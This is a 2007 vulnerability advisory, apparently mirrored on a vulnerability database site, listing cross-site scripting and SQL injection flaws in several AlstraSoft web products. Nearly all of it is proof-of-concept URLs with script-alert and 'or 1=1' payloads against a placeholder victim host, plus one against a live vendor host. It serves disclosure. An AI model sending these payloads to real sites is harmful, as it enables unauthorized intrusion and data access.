`####################################################
AlstraSoft Multiple products multiple Vulnerabilities
Vendor urL:http://www.alstrasoft.com/products.htm
Advisore url:http://lostmon.blogspot.com/2007/07/
alstrasoft-multiple-products-multiple.html
Vendor notify:yes (webform) Exploit included: yes
####################################################
Multiple products of Alstrasoft Are prone vulnerables
to Cross site scripting and SQL injections style attacks
################
examples
################
For exploit some flaws you need to login
multiple other variables are afected y all products :S
#####################################
AlstraSoft Video Share Enterprise
#####################################
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+
sent+"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc"><script>alert()</script>
http://[Victim]/videoshare/signup.php?
next=upload"><script>alert()</script>
http://[Victim]/videoshare/search_result.php?
search_id=ghgdgdfd"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr
http://[Victim]/videoshare/video.php?
category=tf"><script>alert()</script>&viewtype=
http://[Victim]/videoshare/video.php?
page=5"><script>alert()</script>
http://[Victim]/videoshare/compose.php?
receiver=demo"><script>alert()</script>
http://[Victim]/videoshare/groups.php?
b=ra&catgy=Recently%20Added"><script>alert()</script>
http://[Victim]/videoshare/siteadmin/
channels.php?a=Search&channelid=&channelname=%22
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search
http://[Victim]/videoshare/siteadmin/muser.php?
[email protected]&uname=GLAMOROUS"><script>alert()</script>
path disclosure:
http://[Victim]/videoshare/uprofile.php?
UID=53"><script>alert()</script>
http://[Victim]/videoshare/channel_detail.php?
chid=24"><script>alert()</script>
http://[Victim]/videoshare/uvideos.php?UID=53
"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'
http://[Victim]/videoshare/groups_home.php?urlkey=
RSL"><script>alert()</script>
http://[Victim]/videoshare/ufriends.php?UID=253
"><script>alert()</script>
SQL injection :
http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1
###########################################
AlstraSoft Text Ads Enterprise
###########################################
http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script>
http://[Victim]/ads/search_results.php?query="><script>alert()</script>
http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script>
http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script>
#########################################
AlstraSoft SMS Text Messaging Enterprise
########################################
http://[Victim]/admin/membersearch.php?pagina=17&q=
la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://[Victim]/admin/edituser.php?userid=
Walltrapas"><script>alert()</script>
http://[Victim]/admin/membersearch.php?
q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit
#################################################
e-friends
http://alstrahost.com/friends/index.php?mode=
people_card&p_id=927"><script>alert()</script>
this is a persistent XSS
########################################
AlstraSoft Affiliate Network Pro
########################################
http://[Victim]/affiliate/merchants/index.php?
Act=programedit&mode=edit&id=42"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
programedit&mode=edit&id=42&msg=Program%20Edited%20Success
fully"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
uploadProducts&pgmid=41%20or%201=1 // SQL And XSS
http://[Victim]/affiliate/merchants/index.php?Act=
daily&d=9&m=07&y=2007 // all variables XSS affected except Act
http://[Victim]/affiliate/merchants/index.php?Act=
ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date
"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007
&programs=All // all variables XSS affceted except Act y sub
http://[Victim]/affiliate/merchants/temp.php?rowid=
5"><script>alert()</script> // posible SQL too
http://[Victim]/affiliate/merchants/index.php?Act=
add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>
&modofpay=Authorize.net&bankname=&bankno=&
bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=
####################################
AlstraSoft Article Manager Pro
####################################
http://[Victim]/article/contact_author.php?
userid=1%20"><script>alert()</script>
#######################################
AlstraSoft AskMe Pro
#######################################
http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL
http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL
http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script>
http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL
http://[Victim]/ask/register.php?typ=expert"><script>alert()</script>
###################### nd ########################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation